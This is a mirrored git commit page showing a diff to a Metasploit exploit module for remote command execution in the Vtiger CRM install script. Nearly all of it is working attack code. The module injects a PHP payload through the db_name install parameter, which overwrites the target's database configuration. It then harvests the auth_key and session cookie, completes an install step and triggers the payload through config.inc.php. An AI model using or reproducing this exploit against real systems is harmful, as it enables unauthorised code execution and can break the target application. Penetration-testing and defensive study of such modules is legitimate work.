infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix everything that needs to be fixed

bug/bundler_fix
sinn3r 2014-04-08 14:57:42 -05:00
parent ca7dcc0781
commit 4012dd0acc
1 changed files with 49 additions and 46 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
modules/exploits/multi/http/vtiger_install_rce.rb
View File

@ -6,7 +6,9 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # Application database configuration is overwritten
# Application database configuration is overwritten
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
@ -16,12 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Vtiger install script. This module is set to ManualRanking due to this
module overwriting the target database configuration, which may introduce target
instability.
module overwriting the target database configuration, which may result in
a broken web app, and you may not be able to get a session again.
},
'Author' =>
[
'Jonathan Borgeaud < research[at]navixia.com >', # Navixia Research Team
'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
],
'License' => MSF_LICENSE,
'References' =>
@ -51,62 +53,63 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def uri
return target_uri.path
end
def check
return Exploit::CheckCode::Unsupported
end
def exploit
print_status("Injecting payload...")
rand_arg = Rex::Text.rand_text_hex(10)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' =>
{
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'vars_get' => {
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step5',
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // ",
},
'headers' => {'X-Requested-With' => 'whatever'}
})
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
}})
re_authkey='(name)(=)(")(auth_key)(")(\\s+)(value)(=)(").*?((?:[a-z0-9]*))(")'
m=Regexp.new(re_authkey,Regexp::IGNORECASE);
# Check timeout
if not res
print_error("Request timed out, please try again")
return
end
if m.match(res.body)
authkey=m.match(res.body)[10]
if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
authkey = $1
phpsessid = res.get_cookies
print_status("Retrieved Authkey : #{authkey}");
print_status("Retrieved PHPSESSID : #{phpsessid}");
if authkey.blank?
print_error("No AuthKey found")
return
elsif phpsessid.blank?
print_error("No PHP Session ID found")
return
end
print_status("Retrieved Authkey : #{authkey}")
print_status("Retrieved PHPSESSID : #{phpsessid}")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'cookie' => phpsessid,
'vars_get' =>
{
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step7',
'auth_key' => authkey
},
'headers' => {'X-Requested-With' => 'pwned'},
'cookie' => phpsessid
}
})
print_status("Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'config.inc.php'),
'vars_get' =>
{
rand_arg => '1',
}
'uri' => normalize_uri(target_uri.path, 'config.inc.php'),
'vars_get' => { rand_arg => '1' }
})
else
print_error("No auth_key pattern found")
end
end
end